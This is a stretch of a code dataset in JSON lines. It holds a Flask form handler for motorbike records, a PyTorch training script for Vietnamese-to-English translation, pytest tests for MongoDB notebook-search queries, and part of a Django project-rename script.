form[\"dongco\"]\r\n maluc = form[\"maluc\"]\r\n hopso = form[\"hopso\"]\r\n chieucaoyenxe = form[\"chieucaoyenxe\"]\r\n dacdiemkhac = form[\"dacdiemkhac\"]\r\n giaxe = form[\"giaxe\"]\r\n superbike = Bike(bikename = bikename,hangxe = hangxe, image = image ,dongco = dongco , maluc = maluc , hopso = hopso , chieucaoyenxe = chieucaoyenxe , 
dacdiemkhac = dacdiemkhac , giaxe = giaxe)\r\n        superbike.save()\r\n        return render_template(\"add_bike.html\")\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)\r\n\r\n\r\n# bike = Bike.objects.with_id(\"5c1bc34abd42b10f5051e379\")\r\n\r\n# bike.update(set__bikename = \" CB 500F\")\r\n# print(bike.bikename)\r\n    ", "sub_path": "add_bike.py", "file_name": "add_bike.py", "file_ext": "py", "file_size_in_byte": 1146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "mlab.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "models.superbike.Bike", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "535598758", "text": "import numpy as np\nimport time\nimport os\nimport torch.nn as nn\nimport torch\nfrom torch import optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence\nfrom Data_utils import VocabDataset, vocab_collate_func\nfrom preprocessing_util import preposs_toekn, Lang, text2index, construct_Lang\nfrom selfAtten_RNN_Encoder import Encoder\nfrom Multilayers_Decoder import DecoderAtten\nfrom selfatten_RNN_evaluation import evaluate_batch\nfrom config import device, PAD_token, SOS_token, EOS_token, UNK_token, embedding_freeze, vocab_prefix\nimport random\nimport pickle \nfrom SelfAtten_RNN_config import args\nfrom torch.optim.lr_scheduler import LambdaLR\n\n####################Define Global Variable#########################\n\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#print(device)\n\n####################Define Global Variable#########################\n\n\ndef train(input_tensor, input_lengths, target_tensor, target_lengths,\n          encoder, decoder, encoder_optimizer, decoder_optimizer, criterion, \n          teacher_forcing_ratio):\n    '''\n    Run one training step on a single batch.\n    '''\n    batch_size = input_tensor.size(0) \n    encoder_optimizer.zero_grad()\n    decoder_optimizer.zero_grad()\n\n    loss = 0\n    encoder_outputs, encoder_hidden, encoder_cell = encoder(input_tensor, input_lengths)\n\n    decoder_input = torch.tensor([[SOS_token]*batch_size], device=device).transpose(0,1)\n    decoder_hidden,decoder_cell = encoder_hidden, encoder_cell #decoder.initHidden(encoder_hidden)\n    #print(decoder_hidden.size())\n    #print('encoder finished')\n    use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n\n    if use_teacher_forcing:\n        #### Teacher forcing: Feed the target as the next input\n        # target_lengths = target_lengths.cpu().numpy()\n        # sent_not_end_index = list(range(batch_size))\n        # decoding_token_index = 0\n        # while len(sent_not_end_index) > 0:\n        #     decoder_output, decoder_hidden, decoder_attention = decoder(\n        #         decoder_input, decoder_hidden, input_lengths, encoder_outputs)\n        #     sent_not_end_index = 
torch.LongTensor(sent_not_end_index).to(device)\n # loss += criterion(decoder_output.index_select(0,sent_not_end_index), \n # target_tensor[:,decoding_token_index].index_select(0,sent_not_end_index))\n # decoder_input = target_tensor[:,decoding_token_index].unsqueeze(1) # Teacher forcing\n # decoding_token_index += 1\n # end_or_not = target_lengths > decoding_token_index\n # sent_not_end_index = list(np.where(end_or_not)[0])\n ### simple version; \n decoding_token_index = 0\n tgt_max_len_batch = target_lengths.cpu().max().item()\n assert(tgt_max_len_batch==target_tensor.size(1))\n while decoding_token_index < tgt_max_len_batch:\n decoder_output, decoder_hidden, decoder_attention, decoder_cell = decoder(\n decoder_input, decoder_hidden, input_lengths, encoder_outputs, decoder_cell)\n loss += criterion(decoder_output, target_tensor[:,decoding_token_index])\n decoder_input = target_tensor[:,decoding_token_index].unsqueeze(1) # Teacher forcing\n decoding_token_index += 1\n\n else:\n ### debug \n # # Without teacher forcing: use its own predictions as the next input\n # target_lengths_numpy = target_lengths.cpu().numpy()\n # sent_not_end_index = list(range(batch_size))\n # decoding_token_index = 0\n # while len(sent_not_end_index) > 0:\n # decoder_output, decoder_hidden, decoder_attention_weights = decoder(\n # decoder_input, decoder_hidden, input_lengths, encoder_outputs)\n # topv, topi = decoder_output.topk(1)\n # decoder_input = topi.detach() # detach from history as input\n # #print(type(sent_not_end_index[0]))\n # sent_not_end_index = torch.LongTensor(sent_not_end_index).to(device)\n # loss += criterion(decoder_output.index_select(0,sent_not_end_index), \n # target_tensor[:,decoding_token_index].index_select(0,sent_not_end_index))\n # decoding_token_index += 1\n # end_or_not = target_lengths_numpy > decoding_token_index\n # #(target_lengths_numpy > decoding_token_index)*(decoder_input.squeeze().numpy() != EOS_token)\n # sent_not_end_index = list(np.where(end_or_not)[0])\n ### simple version\n decoding_token_index = 0\n tgt_max_len_batch = target_lengths.cpu().max().item()\n assert(tgt_max_len_batch==target_tensor.size(1))\n while decoding_token_index < tgt_max_len_batch:\n decoder_output, decoder_hidden, decoder_attention_weights, decoder_cell = decoder(\n decoder_input, decoder_hidden, input_lengths, encoder_outputs, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.detach() # detach from history as input\n loss += criterion(decoder_output, target_tensor[:,decoding_token_index])\n decoding_token_index += 1\n\n \n # average loss \n #target_lengths.type_as(loss).mean()\n loss.backward()\n\n ### TODO\n # clip for gradient exploding \n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item()/tgt_max_len_batch #torch.div(loss, target_lengths.type_as(loss).mean()).item() #/target_lengths.mean()\n\n\ndef trainIters(train_loader, val_loader, encoder, decoder, num_epochs, \n learning_rate, teacher_forcing_ratio, srcLang, tgtLang, model_save_info, tgt_max_len, beam_size):\n\n encoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-09)\n decoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-09)\n\n if model_save_info['model_path_for_resume'] is not None:\n check_point_state = torch.load(model_save_info['model_path_for_resume'])\n encoder.load_state_dict(check_point_state['encoder_state_dict'])\n 
encoder_optimizer.load_state_dict(check_point_state['encoder_optimizer_state_dict'])\n decoder.load_state_dict(check_point_state['decoder_state_dict'])\n decoder_optimizer.load_state_dict(check_point_state['decoder_optimizer_state_dict'])\n \n lr_decay = False\n def lr_foo(step,warmup_steps = 4000):\n if step < 500:\n return 0.001/(step+1)\n else:\n return 1.0/np.sqrt(args['encoder_embed_dim'])* min(1.0/np.sqrt(step), step*warmup_steps**(-1.5))\n \n criterion = nn.NLLLoss() #nn.NLLLoss(ignore_index=PAD_token)\n max_val_bleu = 0\n \n if lr_decay:\n lambda_T = lambda step: lr_foo(step)\n scheduler_encoder = LambdaLR(encoder_optimizer, lr_lambda=lambda_T)\n scheduler_decoder = LambdaLR(decoder_optimizer, lr_lambda=lambda_T)\n \n for epoch in range(num_epochs): \n n_iter = -1\n start_time = time.time()\n for input_tensor, input_lengths, target_tensor, target_lengths in train_loader:\n n_iter += 1\n \n if lr_decay:\n scheduler_encoder.step()\n scheduler_decoder.step()\n #print('start_step: ', n_iter)\n loss = train(input_tensor, input_lengths, target_tensor, target_lengths, \n encoder, decoder, encoder_optimizer, decoder_optimizer, \n criterion, teacher_forcing_ratio)\n if n_iter % 200 == 0:\n print('Loss:', loss)\n #eva_start = time.time()\n #val_bleu_sacre, val_bleu_nltk, val_loss = evaluate_batch(val_loader, encoder, decoder, criterion, tgt_max_len, tgtLang.index2word, srcLang.index2word)\n #print((time.time()-eva_start)/60)\n #print('epoch: [{}/{}], step: [{}/{}], train_loss:{}, val_bleu_sacre: {}, val_bleu_nltk: {}, val_loss: {}'.format(\n # epoch, num_epochs, n_iter, len(train_loader), loss, val_bleu_sacre[0], val_bleu_nltk, val_loss))\n # print('Decoder parameters grad:')\n # for p in decoder.named_parameters():\n # print(p[0], ': ', p[1].grad.data.abs().mean().item(), p[1].grad.data.abs().max().item(), p[1].data.abs().mean().item(), p[1].data.abs().max().item(), end=' ')\n # print('\\n')\n # print('Encoder Parameters grad:')\n # for p in encoder.named_parameters():\n # print(p[0], ': ', p[1].grad.data.abs().mean().item(), p[1].grad.data.abs().max().item(), p[1].data.abs().mean().item(), p[1].data.abs().max().item(), end=' ')\n # print('\\n')\n val_bleu_sacre, val_bleu_nltk, val_loss = evaluate_batch(val_loader, encoder, decoder, criterion, tgt_max_len, tgtLang.index2word, srcLang.index2word)\n print('epoch: [{}/{}] (Running time {:.3f} min), val_bleu_sacre: {}, val_bleu_nltk: {}, val_loss: {}'.format(epoch, num_epochs, (time.time()-start_time)/60, val_bleu_sacre, val_bleu_nltk, val_loss))\n #val_bleu_sacre_beam, _, _ = evaluate_beam_batch(beam_size, val_loader, encoder, decoder, criterion, tgt_max_len, tgtLang.index2word)\n #print('epoch: [{}/{}] (Running time {:.3f} min), val_bleu_sacre_beam: {}'.format(epoch, num_epochs, (time.time()-start_time)/60, val_bleu_sacre_beam))\n if max_val_bleu < val_bleu_sacre.score:\n max_val_bleu = val_bleu_sacre.score\n ### TODO save best model\n if (epoch+1) % model_save_info['epochs_per_save_model'] == 0:\n check_point_state = {\n 'epoch': epoch,\n 'encoder_state_dict': encoder.state_dict(),\n 'encoder_optimizer_state_dict': encoder_optimizer.state_dict(),\n 'decoder_state_dict': decoder.state_dict(),\n 'decoder_optimizer_state_dict': decoder_optimizer.state_dict()\n }\n torch.save(check_point_state, '{}epoch_{}.pth'.format(model_save_info['model_path'], epoch))\n\n return None\n \n\ndef start_train(transtype, paras):\n src_max_vocab_size = paras['src_max_vocab_size']\n tgt_max_vocab_size = paras['tgt_max_vocab_size']\n tgt_max_len = 
paras['tgt_max_len']\n max_src_len_dataloader = paras['max_src_len_dataloader']\n max_tgt_len_dataloader = paras['max_tgt_len_dataloader']\n\n teacher_forcing_ratio = paras['teacher_forcing_ratio']\n emb_size = paras['emb_size']\n hidden_size = paras['hidden_size']\n num_layers = paras['num_layers']\n num_direction = paras['num_direction']\n deal_bi = paras['deal_bi']\n learning_rate = paras['learning_rate']\n num_epochs = paras['num_epochs']\n batch_size = paras['batch_size']\n rnn_type = paras['rnn_type']\n attention_type = paras['attention_type']\n beam_size = paras['beam_size']\n model_save_info = paras['model_save_info']\n dropout_rate = paras['dropout_rate']\n\n address_book=dict(\n train_src = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/train.tok.{}'.format(transtype[0], transtype[1], transtype[0]),\n train_tgt = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/train.tok.{}'.format(transtype[0], transtype[1], transtype[1]),\n val_src = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/dev.tok.{}'.format(transtype[0], transtype[1], transtype[0]),\n val_tgt = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/dev.tok.{}'.format(transtype[0], transtype[1], transtype[1]),\n src_emb = 'embedding/wiki.{}.vec'.format(transtype[0]),\n tgt_emb = 'embedding/wiki.{}.vec'.format(transtype[1])\n )\n #print(address_book)\n train_src_add = address_book['train_src']\n train_tgt_add = address_book['train_tgt']\n val_src_add = address_book['val_src']\n val_tgt_add = address_book['val_tgt']\n # make dir for saving models\n if not os.path.exists(model_save_info['model_path']):\n os.makedirs(model_save_info['model_path'])\n ### save model hyperparameters\n with open(model_save_info['model_path']+'model_params.pkl', 'wb') as f:\n model_hyparams = paras\n model_hyparams['address_book'] = address_book\n pickle.dump(model_hyparams, f)\n print(model_hyparams)\n\n train_src = []\n with open(train_src_add) as f:\n for line in f:\n train_src.append(preposs_toekn(line[:-1].strip().split(' ')))\n\n train_tgt = []\n with open(train_tgt_add) as f:\n for line in f:\n train_tgt.append(preposs_toekn(line[:-1].strip().split(' ')))\n \n val_src = []\n with open(val_src_add) as f:\n for line in f:\n val_src.append(preposs_toekn(line[:-1].strip().split(' ')))\n\n val_tgt = []\n with open(val_tgt_add) as f:\n for line in f:\n val_tgt.append(preposs_toekn(line[:-1].strip().split(' ')))\n\n print('The number of train samples: ', len(train_src))\n print('The number of val samples: ', len(val_src))\n srcLang = construct_Lang('src', src_max_vocab_size, address_book['src_emb'], train_src)\n tgtLang = construct_Lang('tgt', tgt_max_vocab_size, address_book['tgt_emb'], train_tgt)\n train_input_index = text2index(train_src, srcLang.word2index) #add EOS token here \n train_output_index = text2index(train_tgt, tgtLang.word2index)\n val_input_index = text2index(val_src, srcLang.word2index)\n val_output_index = text2index(val_tgt, tgtLang.word2index)\n ### save srcLang and tgtLang\n\n train_dataset = VocabDataset(train_input_index,train_output_index, max_src_len_dataloader, max_tgt_len_dataloader)\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n collate_fn=vocab_collate_func,\n shuffle=True)\n\n val_dataset = VocabDataset(val_input_index,val_output_index, None, None)\n val_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=batch_size,\n collate_fn=vocab_collate_func,\n shuffle=False)\n\n # test_dataset = VocabDataset(test_data)\n # test_loader = 
torch.utils.data.DataLoader(dataset=test_dataset,\n # batch_size=BATCH_SIZE,\n # collate_fn=vocab_collate_func,\n # shuffle=False)\n\n embedding_src_weight = torch.from_numpy(srcLang.embedding_matrix).type(torch.FloatTensor).to(device)\n embedding_tgt_weight = torch.from_numpy(tgtLang.embedding_matrix).type(torch.FloatTensor).to(device)\n print(embedding_src_weight.size(), embedding_tgt_weight.size())\n if attention_type:\n encoder = Encoder(args, num_layers, vocab_size = srcLang.vocab_size, use_position_emb = False)\n decoder = DecoderAtten(emb_size, hidden_size, tgtLang.vocab_size, num_layers, rnn_type = rnn_type, atten_type = attention_type, dropout_rate = dropout_rate)\n else: \n encoder = Encoder(args, num_layers, vocab_size = srcLang.vocab_size, use_position_emb = False)\n decoder = DecoderRNN(emb_size, hidden_size, tgtLang.vocab_size, num_layers, rnn_type = rnn_type, dropout_rate = dropout_rate)\n\n \n encoder, decoder = encoder.to(device), decoder.to(device)\n print('Encoder:')\n print(encoder)\n print('Decoder:')\n print(decoder)\n trainIters(train_loader, val_loader, encoder, decoder, num_epochs, learning_rate, teacher_forcing_ratio, srcLang, tgtLang, model_save_info, tgt_max_len, beam_size)\n \n\nif __name__ == \"__main__\":\n transtype = ('vi', 'en')\n paras = dict( \n src_max_vocab_size = 26109, # 47127, #26109,\n tgt_max_vocab_size = 24418, #31553, #24418,\n tgt_max_len = 128,\n max_src_len_dataloader = 72, #67, #72, \n max_tgt_len_dataloader = 71, #72, #71, \n\n emb_size = 300,\n hidden_size = 300,\n num_layers = 2,\n num_direction = 1,\n deal_bi = 'linear', #{'linear', 'sum'}\n rnn_type = 'LSTM', # LSTM\n attention_type = 'concat', #'dot_prod', general, concat\n teacher_forcing_ratio = 1,\n\n learning_rate = 3e-4,\n num_epochs = 50,\n batch_size = 128, \n beam_size = 1,\n dropout_rate = 0.1,\n\n model_save_info = dict(\n model_path = 'nmt_models/vi-en-selfattention300-lrdecay_encoderlayer21_random_dr1_lige/',\n epochs_per_save_model = 2,\n model_path_for_resume = None #'nmt_models/epoch_0.pth'\n )\n )\n #print('paras: ', paras)\n start_train(transtype, paras)\n\n\n\n", "sub_path": "SelfAtten_Encoder_RNN_Decoder/SelfAtten_RNN_train.py", "file_name": "SelfAtten_RNN_train.py", "file_ext": "py", "file_size_in_byte": 16795, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.tensor", "line_number": 41, "usage_type": "call"}, {"api_name": "config.SOS_token", "line_number": 41, "usage_type": "name"}, {"api_name": "config.device", "line_number": 41, "usage_type": "name"}, {"api_name": "random.random", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "SelfAtten_RNN_config.args", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.LambdaLR", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.LambdaLR", "line_number": 143, "usage_type": "call"}, {"api_name": "time.time", 
"line_number": 147, "usage_type": "call"}, {"api_name": "selfatten_RNN_evaluation.evaluate_batch", "line_number": 173, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 230, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 235, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 241, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 246, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 251, "usage_type": "call"}, {"api_name": "preprocessing_util.preposs_toekn", "line_number": 256, "usage_type": "call"}, {"api_name": "preprocessing_util.construct_Lang", "line_number": 260, "usage_type": "call"}, {"api_name": "preprocessing_util.construct_Lang", "line_number": 261, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 262, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 263, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 264, "usage_type": "call"}, {"api_name": "preprocessing_util.text2index", "line_number": 265, "usage_type": "call"}, {"api_name": "Data_utils.VocabDataset", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 269, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 269, "usage_type": "attribute"}, {"api_name": "Data_utils.vocab_collate_func", "line_number": 271, "usage_type": "name"}, {"api_name": "Data_utils.VocabDataset", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 275, "usage_type": "attribute"}, {"api_name": "Data_utils.vocab_collate_func", "line_number": 277, "usage_type": "name"}, {"api_name": "config.device", "line_number": 286, "usage_type": "argument"}, {"api_name": "torch.from_numpy", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 286, "usage_type": "attribute"}, {"api_name": "config.device", "line_number": 287, "usage_type": "argument"}, {"api_name": "torch.from_numpy", "line_number": 287, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 287, "usage_type": "attribute"}, {"api_name": "selfAtten_RNN_Encoder.Encoder", "line_number": 290, "usage_type": "call"}, {"api_name": "SelfAtten_RNN_config.args", "line_number": 290, "usage_type": "argument"}, {"api_name": "Multilayers_Decoder.DecoderAtten", "line_number": 291, "usage_type": "call"}, {"api_name": "selfAtten_RNN_Encoder.Encoder", "line_number": 293, "usage_type": "call"}, {"api_name": "SelfAtten_RNN_config.args", "line_number": 293, "usage_type": "argument"}, {"api_name": "config.device", "line_number": 297, "usage_type": "argument"}]} +{"seq_id": "370860770", "text": "import mock\nimport pytest\n\nfrom bson.objectid import ObjectId\nfrom nbsearch.v1 import query\n\nfrom .utils import AsyncMock, AsyncIterator\n\n\n@pytest.mark.asyncio\nasync def test_mongo_query_from_q():\n nq = query.nq_from_q('QUERY')\n assert nq == {'target': {'text': 'QUERY', 'type': 'all'}}\n\n history = mock.Mock()\n notebooks = mock.Mock()\n mongoq = await 
query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$text': {'$search': 'QUERY'}}}]\n\n@pytest.mark.asyncio\nasync def test_mongo_query_from_meme():\n nq = query.nq_from_meme('MEME')\n assert nq == {'cell': {'and': [{'in_meme': 'MEME'}]}}\n\n history = mock.Mock()\n notebooks = mock.Mock()\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'metadata.lc_cell_meme.current': {'$regex': '.*MEME.*'}}}}]}}]\n\n@pytest.mark.asyncio\nasync def test_mongo_query_from_invalid_nq():\n history = mock.Mock()\n notebooks = mock.Mock()\n\n with pytest.raises(KeyError):\n nq = {'cell': {'and': [{'not_valid': 'OUTPUT'}]}}\n await query.mongo_agg_query_from_nq(nq, history, notebooks)\n\n@pytest.mark.asyncio\nasync def test_mongo_cell_query_from_nq():\n history = mock.Mock()\n notebooks = mock.Mock()\n\n nq = {'cell': {'and': [{'in_code': 'CODE'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'code', 'source': {'$regex': '.*CODE.*'}}}}]}}]\n\n nq = {'cell': {'and': [{'not_in_code': 'CODE'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'code', 'source': {'$not': {'$regex': '.*CODE.*'}}}}}]}}]\n\n nq = {'cell': {'and': [{'not_in_code': 'CODE', 'in_output': 'OUTPUT'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'code', 'source': {'$not': {'$regex': '.*CODE.*'}}, 'cell.outputs.text': {'$regex': '.*OUTPUT.*'}}}}]}}]\n\n nq = {'cell': {'and': [{'in_markdown': 'MARKDOWN'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell_type': 'markdown', 'source': {'$regex': '.*MARKDOWN.*'}}}}]}}]\n\n nq = {'cell': {'and': [{'in_output': 'OUTPUT'}]}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$and': [{'cells': {'$elemMatch': {'cell.outputs.text': {'$regex': '.*OUTPUT.*'}}}}]}}]\n\n@pytest.mark.asyncio\nasync def test_mongo_target_query_from_nq():\n history = mock.Mock()\n notebooks = mock.Mock()\n\n nq = {'target': {'text': 'TEXT', 'type': 'all'}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'$text': {'$search': 'TEXT'}}}]\n\n history.find_one = AsyncMock()\n history.find_one.return_value = {'notebook_ids': ['0123456789abcdef01234567', '123456789abcdef012345670']}\n\n nq = {'target': {'history_in': 'abcdef012345670123456789'}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n assert mongoq == [{'$match': {'_id': {'$in': [ObjectId('0123456789abcdef01234567'), ObjectId('123456789abcdef012345670')]}}}]\n\n notebooks.aggregate = mock.Mock()\n notebooks.aggregate.return_value = AsyncIterator([{'_id': 'MEME{0:04d}'.format(i)} for i in range(5)])\n\n nq = {'target': {'history_related': 'abcdef012345670123456789'}}\n mongoq = await query.mongo_agg_query_from_nq(nq, history, notebooks)\n print(mongoq)\n assert mongoq == [{'$match': {'cells': {'$elemMatch': {'$or': [\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0000.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0001.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0002.*'}},\n 
{'metadata.lc_cell_meme.current': {'$regex': '^MEME0003.*'}},\n {'metadata.lc_cell_meme.current': {'$regex': '^MEME0004.*'}}\n ]}}}}]\n", "sub_path": "nbsearch/tests/test_query.py", "file_name": "test_query.py", "file_ext": "py", "file_size_in_byte": 4150, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nbsearch.v1.query.nq_from_q", "line_number": 12, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 12, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 15, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 16, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 17, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 17, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "nbsearch.v1.query.nq_from_meme", "line_number": 22, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 22, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 25, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 26, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 27, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 27, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 32, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 35, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 37, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 37, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 30, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 41, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 42, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 45, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 45, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 49, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 49, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 53, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 53, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 57, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 57, "usage_type": "name"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 61, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 61, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 39, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 66, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 67, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 70, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 70, "usage_type": "name"}, {"api_name": "utils.AsyncMock", "line_number": 73, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 77, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 
77, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 78, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.AsyncIterator", "line_number": 81, "usage_type": "call"}, {"api_name": "nbsearch.v1.query.mongo_agg_query_from_nq", "line_number": 84, "usage_type": "call"}, {"api_name": "nbsearch.v1.query", "line_number": 84, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "531132600", "text": "import sys\nimport re\nimport pathlib\nimport os\nimport fileinput\n\ndef _get_project_name():\n    manage_file_path = os.path.join(pathlib.Path(__file__).parent.absolute(), 'manage.py')\n    with open(manage_file_path) as file:\n        for line in file.readlines():\n            if 'DJANGO_SETTINGS_MODULE' in line:\n                return line.split(\"', '\")[-1].split('.settings')[0]\n\ndef _search_and_replace(file, occurence, replace_by):\n    with fileinput.FileInput(file, inplace=True) as file:\n        for line in file:\n            print(line.replace(occurence, replace_by), end='')\n\n\ndef rename_project(project_name: str):\n    project_name = project_name.lower()\n    if (not re.match(r\"^[a-z0-9_]{3,20}$\", project_name)):\n        sys.exit('Could not change the name of the project.\nThe project name must be lower cased and range from 3 to 20 characters!')\n    \n    old_project_name = _get_project_name()\n    directory_path = pathlib.Path(__file__).parent.absolute()\n\n    to_search = (\n        (old_project_name, 'asgi.py'), \n        (old_project_name, 'settings.py'),\n        (old_project_name, 'wsgi.py'),\n        (old_project_name, 'urls.py'),\n        ('manage.py', ),\n    )\n\n    for path_sequence in to_search:\n        _search_and_replace(os.path.join(directory_path, *path_sequence), old_project_name, project_name)\n    \n    os.rename(os.path.join(directory_path, old_project_name), os.path.join(directory_path, project_name))\n\n\n    if (_get_project_name() == project_name):\n        print(f\"The Django Project has been renamed to '{project_name}' successfully!\")\n    else:\n        print(\"Something went wrong while renaming the project... 
